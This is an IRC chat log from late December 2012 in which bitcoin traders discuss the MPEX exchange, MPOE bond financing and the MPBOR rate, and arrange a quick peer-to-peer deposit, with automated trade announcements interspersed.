23:56:33 jurov: dividends will be returned to me, payment can be at the end if you want, or in daily installments Dec 27 23:56:33 I think this means its 9.9% Dec 27 23:56:34 http://trilema.com/2012/mpoe-november-2012-statement/ Dec 27 23:58:21 Price has been pretty stable, so I think MPOE is going to do very well Dec 27 23:58:33 I bet bondholders get the full 9.9% Dec 27 23:58:41 how much will be left afterwards, who knows. Dec 27 23:59:10 Bugpowder, you are deducting that from MPBOR announced there? but on december 29 there will be different rate announced Dec 27 23:59:43 I was talking about for the current month Dec 27 23:59:52 I just didn't look hard for the info Dec 27 23:59:54 oops Dec 27 23:59:58 but afaik bondholders list for current month is not know yet Dec 28 00:00:06 neither their requested rates Dec 28 00:00:21 OK what does this mean then? Dec 28 00:00:22 MPBOR valid 30 November through 28 December: 9.9%. Dec 28 00:01:02 dunno where mpbor is actually used. maybe for margin? Dec 28 00:01:48 when mpex paid interest, mpbor was used as a basis Dec 28 00:02:11 mircea_popescu, can you enlighten us? Dec 28 00:03:12 I know it's at least used to determin how much of the mpoebot profits go to the bondholders, and how much of their principal is returned to them if they bid too high Dec 28 00:04:32 yes, but it is computed every month in the end when options expire and then not used for anything else? Dec 28 00:06:07 I would venture to guess that it does influence the margin cost somehow too Dec 28 00:06:17 and the B-S 'risk free rate' Dec 28 00:06:28 btw, one can have a peek to 1JPvucRfu3ZzEvfBUQTJwsxMrZjeTqD6zR as to how much capital was provided by bondholders. but requested rates are between them and mircea. Dec 28 00:07:03 jurov: I dunno, also, i think 'high rollers' can request a unique addy Dec 28 00:07:58 clearly, i'm not a high roller, as shown by the tags sending to that addy Dec 28 00:08:10 interesting. Dec 28 00:08:23 haha yes blockchain.info readily identifies you there Dec 28 00:09:09 [MPEX] [S.MPOE] 11094 @ 0.00064 = 7.1002 BTC [+] Dec 28 00:11:13 [MPEX] [S.MPOE] 5932 @ 0.00064 = 3.7965 BTC [+] Dec 28 00:11:55 argh, these steady trades against the wall unnerve me Dec 28 00:13:23 no volatility anymore Dec 28 00:13:57 Buy thru to 66 Dec 28 00:14:06 get that volatility back! Dec 28 00:14:42 so i shall put another loan request on btcjam? Dec 28 00:15:16 Req 4800 BTC to buy thru the annoying wall Dec 28 00:15:16 ;;calc 7562321*0.00064 Dec 28 00:15:16 4839.88544 Dec 28 00:15:49 ic. no problem for btcjam Dec 28 00:19:13 in fact, last time i requested such loan, usagi accused me that i do it only cause i want some movement to show on the graphs Dec 28 00:20:09 perhaps i wont ever forget such hilarity Dec 28 00:27:50 mircea_popescu, can you enlighten us? << well it's used whenever someone wants a reference interest rate. Dec 28 00:28:09 much like the euribor/libor/etc Dec 28 00:28:45 and yes, all bond deposits go to the bond address so people can see what's being deposited during each month. Dec 28 00:29:04 smickles they can for their own account funding, but not for bonds Dec 28 00:29:27 ok. so for example i can put on btcjam "interest rate: MPBOR + 1%" and everyone will know. Dec 28 00:29:36 well... most everyone :p Dec 28 00:29:47 but do it anyway, gives the kids a chance to learn Dec 28 00:30:17 how do you determine what bonds get accepted? Dec 28 00:30:25 but if it's really going to get 25%.. that will be tough Dec 28 00:31:24 Bugpowder, http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Dec 28 00:31:41 Bugpowder all deposits over 100 btc are accepted. they only count towards a month's capital needs if they make the cut Dec 28 00:31:53 jurov: you should do the rate based on what mpbor returns less the principal return Dec 28 00:31:56 each month all bonds are sorted by their interest rate like in a normal auction Dec 28 00:32:25 and as the bids fill on the bot, more capital is accepted? Dec 28 00:32:42 but anyway, more in general about mpbor : it's kinda intended as this hook for people to build stuff on. i dunno exactly what they'd build, Dec 28 00:32:52 but im pretty certain it exposes something fundamental about btc macroeconomics Dec 28 00:32:57 [MPEX] [S.MPOE] 1745 @ 0.00064 = 1.1168 BTC [+] Dec 28 00:33:13 Bugpowder the needed capital is equal to the bot's maximal exposure during the month Dec 28 00:34:22 short puts have infinite exposure Dec 28 00:37:26 wouldn't it make sense for lenders to build upon it somehow? Dec 28 00:37:53 Bugpowder how do you figure ? Dec 28 00:38:28 arent the puts valued at (strike-current)/current Dec 28 00:38:59 hence if current -> 0, puts go to infinity Dec 28 00:39:04 in BTC terms Dec 28 00:40:16 smickles, that was Q for me? i was only half-serious, don't intend such loans atm. but we'll see Dec 28 00:40:37 [MPEX] [S.MPOE] 22700 @ 0.00064 = 14.528 BTC [+] Dec 28 00:43:56 "MtGox’s estimated gross monthly revenue of 3-4`000 BTC stands up some months to S.MPOE’s." Dec 28 00:44:18 Gox makes money from both buyer and seller Dec 28 00:44:25 shouldnt' that be 6-8000 Dec 28 00:44:36 ya but you're not forced to account in btc terms Dec 28 00:44:40 i silently insure them atm Dec 28 00:44:51 in the future there'll prolly have to be something more ellaborate done about it i guess. Dec 28 00:45:13 SOEBOT! Dec 28 00:45:26 Bugpowder it's tough to estimate how much they make, cause of sliding % scales and whatnot. Dec 28 00:45:30 mircea_popescu: the "deal" mentioned in the link above is still on topic? Dec 28 00:45:38 sgnb which deal you mean ? Dec 28 00:46:11 financing MPOE by lending xxx.00000888 BTC Dec 28 00:47:10 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Dec 28 00:47:11 sgnb, that's exactly the bonds we're talking about all time :) Dec 28 00:47:14 The absolute minimum gox makes on any trade is 0.5% Dec 28 00:47:46 sgnb yes, ever since thebeginning this is how the bot was financed. it's not going to go away either Dec 28 00:47:54 between two accounts that have volume of > half the monthly Dec 28 00:47:55 [MPEX] [S.DICE] 321 @ 0.00355083 = 1.1398 BTC [+] Dec 28 00:47:56 [MPEX] [S.DICE] 1000 @ 0.00353592 = 3.5359 BTC [-] Dec 28 00:47:57 [MPEX] [S.DICE] 1050 @ 0.00352003 = 3.696 BTC [-] Dec 28 00:48:17 Bugpowder iirc it goes to .3% privately. Dec 28 00:48:22 .5% is what's publicly exposed Dec 28 00:48:42 0.25% for >500,000 BTC /mo Dec 28 00:48:50 o is it ? Dec 28 00:49:01 https://mtgox.com/fee-schedule Dec 28 00:49:53 i guess must grow moar. Dec 28 00:49:54 < sgnb> mircea_popescu: the "deal" mentioned in the link above is still on topic? /me now watches 1JPvuc for a tx Dec 28 00:50:58 [MPEX] [S.MPOE] 27750 @ 0.00064 = 17.76 BTC [+] Dec 28 00:53:53 *shameless plug* sgnb: for investments under 100BTC, consider https://bitfunder.com/asset/CoinBr.MPBPT-O Dec 28 01:12:11 jurov: how has that been selling? Dec 28 01:13:12 hmm.. 99,500 ฿0.1010 Dec 28 01:13:27 the first discounted 50BTC sold out. the rest we're gonna fill in ourselves Dec 28 01:13:49 unless thre will be some last minute action Dec 28 01:14:43 jurov: do you disclose the rate you bid at? Dec 28 01:15:36 we'll disclose it afterwards. but as i said at forums, we'll go somewhere very conservative like 4.8% Dec 28 01:16:27 well it'll be de facto disclosed on month's end seeing how you'll be in the list Dec 28 01:25:29 [MPEX] [S.MPOE] 7812 @ 0.00064 = 4.9997 BTC [+] Dec 28 01:25:59 [MPEX] [S.MPOE] 7813 @ 0.00064 = 5.0003 BTC [+] Dec 28 01:26:22 [MPEX] [S.MPOE] 7812 @ 0.00064 = 4.9997 BTC [+] Dec 28 01:26:39 [MPEX] [S.MPOE] 7813 @ 0.00064 = 5.0003 BTC [+] Dec 28 01:26:52 [MPEX] [S.MPOE] 7812 @ 0.00064 = 4.9997 BTC [+] Dec 28 01:27:00 omfg Dec 28 01:29:16 what to make of such pattern Dec 28 01:29:55 Is there a concise name for the MPBOR rate less the % accounted for by the principal return? Dec 28 01:29:56 [MPEX] [S.MPOE] 6650 @ 0.00064 = 4.256 BTC [+] Dec 28 01:30:12 aw, I was hoping the pattern would continue Dec 28 01:30:38 i call that rate one smickle Dec 28 01:31:09 "rate one smickle"? not very concise Dec 28 01:31:09 heh, I like it Dec 28 01:31:33 fuck concise, it's not like that was the only criterion Dec 28 01:32:10 ;D Dec 28 01:32:23 "the smickle rate" Dec 28 01:32:54 smicklish Dec 28 01:33:28 smicklez % Dec 28 01:35:58 smickle vig Dec 28 01:36:07 *jig Dec 28 01:36:12 jig? Dec 28 01:36:31 if it will be negative, we'll say Dec 28 01:36:38 smickle jig , it is up Dec 28 01:36:47 lol Dec 28 01:37:52 [MPEX] [S.MPOE] 9350 @ 0.00064 = 5.984 BTC [+] Dec 28 01:46:59 [MPEX] [S.MPOE] 9600 @ 0.00064 = 6.144 BTC [+] Dec 28 01:47:29 https://docs.google.com/spreadsheet/ccc?key=0AlhB0UHVxS67dGpBc2Rub3FtLTdHZ3ZPb09DY2pHWlE Dec 28 01:47:40 check the E column :P Dec 28 01:47:42 :D Dec 28 01:48:18 lol Dec 28 01:48:54 so i see jurov's pseudorandom number geenrator disguised as a trade bot is buying mpoe... Dec 28 01:49:21 emphasis on the psuedo Dec 28 01:49:24 btw, from that link : "Utilizaţi un browser neacceptat. Este posibil ca unele funcţii să nu funcţioneze corect. Treceţi la un browser modern, cum ar fi Google Chrome." Dec 28 01:49:38 you are utilizing an unacceptable browser. it's possible some functions do not function. Dec 28 01:50:06 unacceptable Dec 28 01:50:06 i have no objection at all if the bot survived reboot and uses bitcoins from some parallel dimension, Dec 28 01:51:58 http://live.coinbr.com/?mpsic=S.MPOE is boring now Dec 28 01:52:18 that diffusion pattern from some time ago was much cooler Dec 28 01:52:22 agreed Dec 28 01:53:01 nuff said. someone lend me 4800btc. Dec 28 01:57:25 ok, mircea_popescu this close to expiry, my valuation of p130t shows a significant difference from mpoebot Dec 28 01:57:34 ya well Dec 28 01:57:56 [MPEX] [S.MPOE] 9600 @ 0.00064 = 6.144 BTC [+] Dec 28 01:58:02 if i don't sell ppl complain that i r manipulating the price by not selling Dec 28 01:59:55 [MPEX] [S.MPOE] 8653 @ 0.00064 = 5.5379 BTC [+] Dec 28 02:01:16 oh we (at least me) isn't complaining about you. nobody could predict it will create so strong hanging carrot effect Dec 28 02:04:15 usagi knew it would Dec 28 02:04:31 so did eskimobob and ciucuicuicui Dec 28 02:05:00 ;;seen eskimobob Dec 28 02:05:01 eskimobob was last seen in #bitcoin-assets 6 hours, 46 minutes, and 15 seconds ago: 50K ART is all gone :) Dec 28 02:07:41 i've had that guy on ignore for a week or so Dec 28 02:07:45 it pays. Dec 28 02:09:00 [MPEX] [S.MPOE] 10000 @ 0.00064 = 6.4 BTC [+] Dec 28 02:09:37 i'm about to ignore assbot if he doesn't start reporting some different prices Dec 28 02:10:13 whoa check out the sell side on mpoe Dec 28 02:10:17 me, alone. Dec 28 02:10:56 [MPEX] [S.MPOE] 7550 @ 0.00064 = 4.832 BTC [+] Dec 28 02:11:24 mircea_popescu: loan jurov 4800 btc Dec 28 02:11:28 [MPEX] [S.MPOE] 1700 @ 0.00063994 = 1.0879 BTC [-] Dec 28 02:11:30 [MPEX] [S.MPOE] 9800 @ 0.00063973 = 6.2694 BTC [-] Dec 28 02:11:31 [MPEX] [S.MPOE] 2100 @ 0.00063946 = 1.3429 BTC [-] Dec 28 02:11:32 [MPEX] [S.MPOE] 4550 @ 0.00063945 = 2.9095 BTC [-] Dec 28 02:11:33 [MPEX] [S.MPOE] 4400 @ 0.00063943 = 2.8135 BTC [-] Dec 28 02:11:35 [MPEX] [S.MPOE] 27450 @ 0.00063915 = 17.5447 BTC [-] Dec 28 02:11:52 lol, assbot delivers to pigeons Dec 28 02:11:55 lol Dec 28 02:12:04 heh Dec 28 02:12:06 fear me Dec 28 02:16:45 i thought i have a bug on live.coinbr.com, that trade is not visible Dec 28 02:16:55 but it's just completely insignificant Dec 28 02:17:56 so much for pigeons power Dec 28 02:20:12 there you go different prices Dec 28 02:22:39 [MPEX] [S.MPOE] 8000 @ 0.00064 = 5.12 BTC [+] Dec 28 02:24:11 [MPEX] [S.MPOE] 4818 @ 0.00064 = 3.0835 BTC [+] Dec 28 02:24:58 I wonder if people will buy out tier 3 as well @ .00067 Dec 28 02:25:14 mircea_popescu: the price stabilizer :P Dec 28 02:27:44 eventually they will Dec 28 02:28:11 and at 0.0007 whole thing will be worth 700k BTC Dec 28 02:28:52 and mpoe will become bitcoin central bank Dec 28 02:28:59 if it sin't already Dec 28 02:29:15 crazy Dec 28 02:32:07 [MPEX] [S.MPOE] 10200 @ 0.00064 = 6.528 BTC [+] Dec 28 02:32:34 that's more BTC than pirate had Dec 28 02:32:36 lol Dec 28 02:37:01 I think soon there will be so much free wi-fi available, you could in theory use the internet for free. Dec 28 02:38:03 thestringpuller, where do you live? it's already practice here Dec 28 02:39:22 i found out they put a hotspot into public transport bus, too Dec 28 02:39:27 recently Dec 28 02:40:50 I hear that in places like seatle, they actually have a functioning city-wide meshnet, a sort've independant internet Dec 28 02:41:03 that's more BTC than pirate had << and more "had" than pirate's, too. Dec 28 02:43:32 jurov the recent sell actually is in there! http://live.coinbr.com/?mpsic=S.MPOE << little barb to the left off that price harpoon Dec 28 02:43:53 yes, it shows how insignificant it is Dec 28 02:44:01 mircea_popescu: when will mpex account holders have a copy of blockchain they can access via mpex and a BCCAPI server :P Dec 28 02:44:09 oh never? XD Dec 28 02:44:22 why;'d they access the blockchain via mpex ? Dec 28 02:44:39 this is like accessing your spoon via the bucket. Dec 28 02:45:14 aren't you planning to one day automate deposits? Dec 28 02:45:24 nope. Dec 28 02:45:25 maybe I should have started with that Dec 28 02:45:29 WELL I SEE HOW IT IS Dec 28 02:46:00 that's actually a service people can provide themselves. Dec 28 02:46:01 [MPEX] [S.MPOE] 9300 @ 0.00064 = 5.952 BTC [+] Dec 28 02:46:05 what happens when you have a million users Dec 28 02:46:07 thestringpuller: someone with accounts can automate deposits Dec 28 02:46:09 actually, iirc kakobrekla's smpake either is or is going to. Dec 28 02:46:17 damn, mircea_popescu beat me to it Dec 28 02:46:27 and i'm well on the way to automate mpex deposits. already get email notifications Dec 28 02:46:32 too Dec 28 02:47:07 we can do instant deposits too Dec 28 02:47:19 all deposites go to android:layout_weight="1" Dec 28 02:47:19 android:layout_width="0dp" Dec 28 02:47:19 android:layout_height="wrap_content" Dec 28 02:47:25 wow Dec 28 02:47:34 my buffers are not having fun today Dec 28 02:47:44 omg hax Dec 28 02:47:48 say jurov has 10 spare mpexbtc, I want to deposit 10 btc, i send 10 btc to jurov he txfrs 10 mpex btc to my account Dec 28 02:47:50 all deposits go to 1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx << Dec 28 02:48:02 yea Dec 28 02:48:05 yea but what if I have an mpex account Dec 28 02:48:10 and I want to add btc to my account Dec 28 02:48:21 like a lot Dec 28 02:48:27 say 2000 BTC and no one has it to front Dec 28 02:48:36 how does that get processed? Dec 28 02:48:45 it doesnt Dec 28 02:48:56 does PUSH work with C.BTC? Dec 28 02:49:04 what do you mean how ? 2k deposits happen routinely atm lol Dec 28 02:49:09 pigeons yes. Dec 28 02:49:18 ok solved. Dec 28 02:49:20 well not via 10 spare mpexbtc Dec 28 02:49:24 kakobrekla : milk http://polimedia.us/dtng/c/src/135571472587.jpg Dec 28 02:49:40 yummy Dec 28 02:50:01 imma gonna use this one Dec 28 02:50:03 or it could be shampoo Dec 28 02:50:24 mircea_popescu, FAQ says PUSH works for excluding cash Dec 28 02:50:35 jurov yeah. it speaks lies. Dec 28 02:50:43 thestringpuller: if you have an mpex account, you can deposit any amount you want Dec 28 02:51:07 but it's not automated Dec 28 02:51:08 as in 6 confirms Dec 28 02:51:15 how does it get processed? manual confirmation Dec 28 02:51:42 i'm just splitting hairs Dec 28 02:51:49 jurov fixed now. Dec 28 02:51:57 a trained ape sees the tx, evaluates it, and flips a few bits on a hd Dec 28 02:52:11 ;D Dec 28 02:52:12 thestringpuller you know, if you deposit 500 mn in 1mn bearer certificates in your bank account Dec 28 02:52:17 ITS NOT GOING TO BE AUTOMATED EITHER. Dec 28 02:52:39 I was heckling you! I'm sorry. Dec 28 02:52:52 automation and risk management are pretty much contrarian Dec 28 02:52:55 plus its pretty darn quick in practice, and its not like mircea_popescu is busy doing anything else if you wanna just bug him to process your deposit Dec 28 02:53:04 haha, i could have been offering quick deposit service already, if i had the audacity to ask why faq says so Dec 28 02:53:10 i am so doing anything else! Dec 28 02:53:15 waaaah i don't want to pay 20 btc for an account so I can slap around .05 btc on options Dec 28 02:53:16 like girls and stuff. Dec 28 02:53:29 jurov ikr ? kakobrekla asked. Dec 28 02:53:34 he would welcome the excuse to get out of whatever else he is engaged in to process deposits Dec 28 02:53:38 kakobrekla: didn't we already do a quick deposit b/t each other? Dec 28 02:53:56 wha? Dec 28 02:54:05 it was me and someone, idk Dec 28 02:54:27 deposit to where? Dec 28 02:54:32 perhaps glbse back in the day Dec 28 02:54:33 I needed liek 10 btc on mpex quick, someone obliged Dec 28 02:54:40 when mircea_popescu was asleep Dec 28 02:54:44 funny how i can say that after a month or so Dec 28 02:54:50 'back in the day' Dec 28 02:55:11 no i dont think so Dec 28 02:55:17 i did glbse manually Dec 28 02:55:23 it just never occurred to me to test push with cxbtc Dec 28 02:55:27 smpake does only gox for now Dec 28 02:55:40 it was written in smpake thread Dec 28 02:55:45 cxbtc will be supported as well Dec 28 02:55:46 /g 17 Dec 28 02:55:49 er Dec 28 02:55:54 what's smpake? Dec 28 02:55:56 but then i figured i should better recode first Dec 28 02:56:18 oh i see Dec 28 02:56:24 thestringpuller smpake.com Dec 28 02:56:27 OK, you can ask me as well to do it anytime, for amounts < 15BTC atm. Dec 28 02:56:46 user interface on coinbr will follow soon Dec 28 02:57:07 well there you go Dec 28 02:57:13 i see kakobrekla i've used it before lol Dec 28 02:57:14 cool stuff Dec 28 02:57:17 so I should know what it is Dec 28 02:57:38 jurov: is there a fee? Dec 28 02:57:40 what's cxbtc? Dec 28 02:57:52 C.BTC Dec 28 02:57:53 thestringpuller: it's how mpex displays your btc balance Dec 28 02:58:21 smickles: no fee this year Dec 28 02:58:42 no fee for you! come back, one year! Dec 28 02:58:52 "this year", he says. crackin' wise, this guy Dec 28 02:59:28 [MPEX] [S.MPOE] 13100 @ 0.00064 = 8.384 BTC [+] Dec 28 03:04:23 jurov: let's test it! Dec 28 03:04:52 yes? Dec 28 03:05:01 send me 10 btc Dec 28 03:05:07 ;;ident Dec 28 03:05:08 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Dec 28 03:05:16 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F Dec 28 03:07:01 no, you send me 10btc Dec 28 03:07:09 [02:06] Error: Problem creating encrypted OTP file. :( Dec 28 03:07:47 well, I wanted to get 10 more btc onto mpex, not 10 less Dec 28 03:08:18 i'm confused. you want to fund or withdraw? Dec 28 03:08:34 fund Dec 28 03:10:25 ;;calc 1.002**((1/24)/365) Dec 28 03:10:26 1.00000022808 Dec 28 03:10:40 In order to make this deposit please send to the exchange address ( 1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx ) the sum of 10.00296524 BTC exactly. Your transaction will be manually approved, so please allow up to 48 hours for funds to show up in your account. Dec 28 03:11:18 smickles, when i see the tx, i'll push the C.BTC to 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F Dec 28 03:12:05 sent Dec 28 03:12:06 this is odd Dec 28 03:13:26 jurov: though, when you automate it, the client should send 10 btc to you, and you send the 10.XX btc to 1Fx Dec 28 03:16:26 [MPEX] [S.MPOE] 22850 @ 0.00064 = 14.624 BTC [+] Dec 28 03:17:07 push done Dec 28 03:17:13 received Dec 28 03:17:20 ;;rated jurov Dec 28 03:17:21 You have not yet rated user jurov Dec 28 03:17:26 ;;rate jurov 1 Dec 28 03:17:29 Rating entry successful. Your rating of 1 for user jurov has been recorded. Dec 28 03:17:39 i can't auth with gribble Dec 28 03:17:53 i'll verify your identity later Dec 28 03:18:11 my question is, why do things this way ? Dec 28 03:19:36 for when your trained ape is offline Dec 28 03:19:36 it's supposed to be faster Dec 28 03:20:07 but... if you send the btc to mpex's address it still waits on mpex ? Dec 28 03:20:16 doesn't that defeat the entire purpose ? Dec 28 03:20:31 smickles does not have to wait on mpex Dec 28 03:20:41 only i have to, but i don't mind Dec 28 03:21:07 i guess that's a point. Dec 28 03:21:18 cause i must have some reserve on mpex anyway Dec 28 03:22:12 anyway, the way push is structured there's nothing to prevent a lot of further development here. i imagine one next step is a loans secured by shares business Dec 28 03:22:28 smickles: and i prefer users to directly deposit to mpex cause of faster turnover Dec 28 03:22:37 and in the end i guess mpex accounts will look a lot more like banks than anything Dec 28 03:28:57 maybe they will look like bank when balance+all pending transactions will be consistent at all times Dec 28 03:30:28 all *shown* pending transactions, i mean Dec 28 03:30:53 check out the spread on P130T Dec 28 03:32:13 serious scalping opportunity, i say Dec 28 03:33:19 [MPEX] [S.MPOE] 3100 @ 0.00064 = 1.984 BTC [+] Dec 28 03:36:06 buy 7 sell 8 satoshi ? Dec 28 03:36:27 smickles is testing teh bot Dec 28 03:37:04 clearly, it's an int division issue Dec 28 03:38:47 [MPEX] [S.MPOE] 1650 @ 0.00064 = 1.056 BTC [+] Dec 28 03:38:58 srsly, mircea_popescu you need me to add this 15 satoshi of liquidity Dec 28 03:42:47 ;;bc,24hprc Dec 28 03:42:49 13.32 Dec 28 03:46:25 [MPEX] [O.BTCUSD.P130T] 1 @ 0.00000008 BTC [-] Dec 28 03:47:08 [MPEX] [S.MPOE] 5100 @ 0.00064 = 3.264 BTC [+] Dec 28 03:48:02 i sure do! Dec 28 03:50:29 how about that Dec 28 04:04:01 [MPEX] [S.MPOE] 4900 @ 0.00064 = 3.136 BTC [+] Dec 28 04:20:39 [MPEX] [S.MPOE] 1700 @ 0.00064 = 1.088 BTC [+] Dec 28 04:23:53 [MPEX] [S.MPOE] 10300 @ 0.00064 = 6.592 BTC [+] Dec 28 04:42:51 [MPEX] [S.MPOE] 7954 @ 0.00064 = 5.0906 BTC [+] Dec 28 04:53:53 ;;tslb Dec 28 04:53:56 Time since last block: 24 minutes and 43 seconds Dec 28 05:00:03 [MPEX] [S.MPOE] 10400 @ 0.00064 = 6.656 BTC [+] Dec 28 05:01:38 ;;bc,stats Dec 28 05:01:42 Current Blocks: 213943 | Current Difficulty: 2979636.6169381 | Next Difficulty At Block: 215711 | Next Difficulty In: 1768 blocks | Next Difficulty In About: 1 week, 3 days, 23 hours, 14 minutes, and 8 seconds | Next Difficulty Estimate: 3347057.04349520 | Estimated Percent Change: 12.3310481711 Dec 28 05:04:16 [MPEX] [S.MPOE] 12183 @ 0.00064 = 7.7971 BTC [+] Dec 28 05:09:53 [MPEX] [S.MPOE] 10250 @ 0.00064 = 6.56 BTC [+] Dec 28 05:10:35 [MPEX] [S.MPOE] 12500 @ 0.00064 = 8 BTC [+] Dec 28 05:12:07 [MPEX] [S.MPOE] 23600 @ 0.00064 = 15.104 BTC [+] Dec 28 05:13:55 [MPEX] [S.MPOE] 7200 @ 0.00064 = 4.608 BTC [+] Dec 28 05:15:23 ;;rated kakobrekla Dec 28 05:15:24 You rated user kakobrekla on Thu Oct 11 11:36:14 2012, giving him a rating of 1, and supplied these additional notes: facilitated a short term loan. Dec 28 05:16:03 ;;rate kakobrekla 1 facilitated a short term loan, smpake.com is awesome. use it. Dec 28 05:16:05 Rating entry successful. Your rating for user kakobrekla has changed from 1 to 1. Dec 28 05:16:23 the Dec 28 05:17:14 [MPEX] [S.MPOE] 4150 @ 0.00064 = 2.656 BTC [+] Dec 28 05:17:55 commission for the previous 2 users goes to jcpham Dec 28 05:18:17 rofl Dec 28 05:19:41 heh, I was an early user of smpake, this was just the first significant use Dec 28 05:20:35 i havent touched it in too long. Dec 28 05:20:46 [MPEX] [S.MPOE] 700 @ 0.00064 = 0.448 BTC [+] Dec 28 05:20:53 i touch it every day Dec 28 05:21:05 ;> Dec 28 05:23:25 hi Dec 28 05:23:37 this thing works like Forex Dec 28 05:23:54 or people actually hold shares for a long time Dec 28 05:24:00 what is this thing Dec 28 05:24:07 im new to this Dec 28 05:24:21 if you could explain it briefly Dec 28 05:24:37 works abosolutely like real stocks ? Dec 28 05:25:07 you mean mpex? yeah just like real stock. the glbse stock are completley virtual tho. Dec 28 05:25:52 you get live quotes like FX Dec 28 05:26:18 they change every 5 minutes or so like real world stocks Dec 28 05:26:29 are you a forex user? Dec 28 05:26:31 or people use to hold em Dec 28 05:26:33 yes Dec 28 05:26:37 oh well Dec 28 05:26:43 then you must check bit4x.com Dec 28 05:27:07 really Dec 28 05:27:15 can believe its real ! Dec 28 05:27:30 and BTC varies way more than any coin Dec 28 05:27:32 !! Dec 28 05:27:44 has longer spreads ? Dec 28 05:27:46 you cant trade btc pair on forex, you can trade forex with btc Dec 28 05:27:59 profit and losses are btc Dec 28 05:28:00 oh well Dec 28 05:28:05 not euro dollar whatever Dec 28 05:28:31 i trade BTCUSD or EURUSD Dec 28 05:28:36 ? Dec 28 05:28:40 eurusd Dec 28 05:28:43 in btc Dec 28 05:29:03 worth trying thanks Dec 28 05:29:13 way to advertise the site Dec 28 05:29:16 Lol Dec 28 05:29:21 ;) Dec 28 05:29:40 well i thought you might find it useful since you mentined forex Dec 28 05:29:56 any restrictions on the bonus Dec 28 05:30:02 i could put it in the topic Dec 28 05:30:03 and yes you were right Dec 28 05:30:08 but nobody reads that Dec 28 05:30:36 faq: Am I eligible for the 5 BTC bonus? Dec 28 05:30:36 When you open a Live account a 5 BTC bonus will be awarded to your balance. In order to withdraw the bonus, one must have have closed at least 5 trades on the Live account. Dec 28 05:30:47 can you open me an account Dec 28 05:31:03 or mail is automated ? Dec 28 05:31:04 sure, send me an email as it says on the site Dec 28 05:31:09 its not automated Dec 28 05:31:12 but its the procedure Dec 28 05:31:48 if you send me the info now ill reply you with a deposit addy Dec 28 05:32:10 okay Dec 28 05:32:12 [MPEX] [S.MPOE] 11250 @ 0.00064 = 7.2 BTC [+] Dec 28 05:32:20 if you can deposit today youll get an account on monday Dec 28 05:32:22 or so Dec 28 05:32:23 where i can grab gpg for windows Dec 28 05:32:41 http://www.gnupg.org/related_software/gpa/index.en.html Dec 28 05:32:44 ;;google gpg4win Dec 28 05:32:45 Gpg4win - Secure email and file encryption with GnuPG for Windows: ; Gpg4win - Download Gpg4win: ; Gpg4win - About Gpg4win: Dec 28 05:32:49 okay Dec 28 05:33:25 yeah Dec 28 05:33:28 best to sign it Dec 28 05:33:32 if you can be bothered Dec 28 05:34:13 better to not Dec 28 05:34:26 not a bitcoin adv user Dec 28 05:35:42 kakobrekla: checkit, i'm blowing the socks off the mpoebot's prices on the 13,14 strikes Dec 28 05:36:17 smickles url? Dec 28 05:37:03 >,> Dec 28 05:37:10 fulluser, you didnt sign the email Dec 28 05:37:26 fulluser id you want your key id in your contract do that now Dec 28 05:37:27 http://mpex.co/?mpsic=O.BTCUSD.P130T Dec 28 05:37:28 http://mpex.co/?mpsic=O.BTCUSD.C130T Dec 28 05:37:28 http://mpex.co/?mpsic=O.BTCUSD.P140T Dec 28 05:37:28 http://mpex.co/?mpsic=O.BTCUSD.C140T Dec 28 05:37:33 else ill do it w/o Dec 28 05:37:46 aaa Dec 28 05:38:07 not to shabby ;) Dec 28 05:38:11 [MPEX] [S.MPOE] 17000 @ 0.00064 = 10.88 BTC [+] Dec 28 05:38:48 yeah, a little more bug testing, then I'll throw some btc at it, then later, I might seek funding for it too Dec 28 05:39:44 ;;ticker Dec 28 05:39:45 BTCUSD ticker | Best bid: 13.42174, Best ask: 13.43787, Bid-ask spread: 0.01613, Last trade: 13.60000, 24 hour volume: 19062.67342392, 24 hour low: 13.25000, 24 hour high: 13.60000, 24 hour vwap: 13.38236 Dec 28 05:39:58 we just hit 13.6 eh? Dec 28 05:40:06 again. Dec 28 05:40:19 [MPEX] [S.MPOE] 7875 @ 0.00064 = 5.04 BTC [+] Dec 28 05:40:31 lol, i just realized you could say that to any # up to 30ish Dec 28 05:40:48 yep Dec 28 05:40:51 :) Dec 28 05:41:05 ;;bc,24hprc Dec 28 05:41:06 13.32 Dec 28 05:43:38 hi Dec 28 05:43:54 sent you the mail (bit4x owner) Dec 28 05:44:10 04:37.11 ( kakobrekla ) fulluser, you didnt sign the email Dec 28 05:44:11 04:37.28 ( kakobrekla ) fulluser id you want your key id in your contract do that now Dec 28 05:44:24 yeah lets do this via pm Dec 28 05:50:34 [MPEX] [S.MPOE] 3385 @ 0.00064 = 2.1664 BTC [+] Dec 28 06:08:32 [MPEX] [S.MPOE] 8300 @ 0.00064 = 5.312 BTC [+] Dec 28 06:11:05 smickles you know it doesn't price on the last day right ? Dec 28 06:12:00 [MPEX] [S.MPOE] 10700 @ 0.00064 = 6.848 BTC [+] Dec 28 06:20:30 [MPEX] [S.MPOE] 13116 @ 0.00064 = 8.3942 BTC [+] Dec 28 06:22:22 [MPEX] [S.MPOE] 9400 @ 0.00064 = 6.016 BTC [+] Dec 28 06:24:34 [MPEX] [S.MPOE] 12700 @ 0.00064 = 8.128 BTC [+] Dec 28 06:25:13 mircea_popescu: yes, that's why i'm rockin' yo socks yo! Dec 28 06:25:23 it was a joke :P Dec 28 06:25:36 lolk Dec 28 06:26:02 anyway, with the currently limited funds, i've expanded to the 12 to 15 range of strikes :D Dec 28 06:29:37 [MPEX] [S.MPOE] 14400 @ 0.00064 = 9.216 BTC [+] Dec 28 06:34:02 [MPEX] [S.MPOE] 9867 @ 0.00064 = 6.3149 BTC [+] Dec 28 06:38:09 keyserver for mpex Dec 28 06:38:11 ? Dec 28 06:38:34 fulluser20 what do you mean ? Dec 28 06:39:03 >gpg --search-keys "F1B69921" Dec 28 06:39:09 (mpex key Dec 28 06:39:19 no leyservers known Dec 28 06:39:24 keyserver Dec 28 06:39:45 uh Dec 28 06:40:07 http://mpex.co/faq.html#8 Dec 28 06:40:09 see that Dec 28 